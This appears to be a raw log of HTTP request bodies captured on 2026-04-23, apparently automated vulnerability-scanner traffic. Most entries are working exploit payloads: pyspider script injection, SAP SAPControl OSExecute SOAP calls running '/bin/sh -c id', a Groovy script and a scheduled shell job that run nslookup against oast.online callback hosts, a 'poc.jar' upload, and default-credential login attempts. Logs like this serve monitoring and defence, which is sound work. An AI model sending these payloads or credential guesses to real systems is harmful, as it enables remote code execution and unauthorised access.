At 2026-04-23T16:06:04:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D |
At 2026-04-23T16:05:18:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=admin&password=admin |
At 2026-04-23T16:05:17:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=sonar&password=admin |
At 2026-04-23T16:05:07:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=admin&password=sonar |
At 2026-04-23T16:05:07:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=sonar&password=sonar |
At 2026-04-23T16:05:06:
| Content Type | text/xml; charset=UTF-8 |
|---|---|
| Headers |
|
| Body | <?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> |
At 2026-04-23T16:05:05:
| Content Type | text/xml; charset=UTF-8 |
|---|---|
| Headers |
|
| Body | <?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> |
At 2026-04-23T16:05:04:
| Content Type | text/xml; charset=UTF-8 |
|---|---|
| Headers |
|
| Body | <?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> |
At 2026-04-23T16:04:18:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | groovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+d7l45bv25c8lnmpe5gr0gxr98tdwg8amj.oast.online'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B |
At 2026-04-23T16:04:15:
| Content Type | None |
|---|---|
| Headers |
|
| Body | {"ephemeral":true,"disabled":false,"name":"bpafx","schedule":"@every 1s","executor":"shell","executor_config":{"command":"nslookup bpafx.d7l45bv25c8lnmpe5gr0yuhuq71hzra1a.oast.online","cwd":"/tmp/","env":"ENV_VAR=va1,ANOTHER_ENV_VAR=var2","shell":"true","timeout":"10s"},"retries":null} |
At 2026-04-23T16:04:14:
| Content Type | multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 |
|---|---|
| Headers |
|
| Body | --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream 3ClVWYLCGZ7UzieOpFRIpUEGRj3 --8ce4b16b22b58894aa86c421e8759df3-- |
At 2026-04-23T16:04:08:
| Content Type | application/json |
|---|---|
| Headers |
|
| Body | {"password":"captain42"} |
At 2026-04-23T16:03:48:
| Content Type | None |
|---|---|
| Headers |
|
| Body |
At 2026-04-23T14:59:59:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D |
At 2026-04-23T14:59:11:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=admin&password=admin |
At 2026-04-23T14:59:11:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=admin&password=sonar |
At 2026-04-23T14:59:04:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=sonar&password=admin |
At 2026-04-23T14:59:04:
| Content Type | application/x-www-form-urlencoded |
|---|---|
| Headers |
|
| Body | login=sonar&password=sonar |
At 2026-04-23T14:59:00:
| Content Type | text/xml; charset=UTF-8 |
|---|---|
| Headers |
|
| Body | <?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> |
At 2026-04-23T14:59:00:
| Content Type | text/xml; charset=UTF-8 |
|---|---|
| Headers |
|
| Body | <?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> |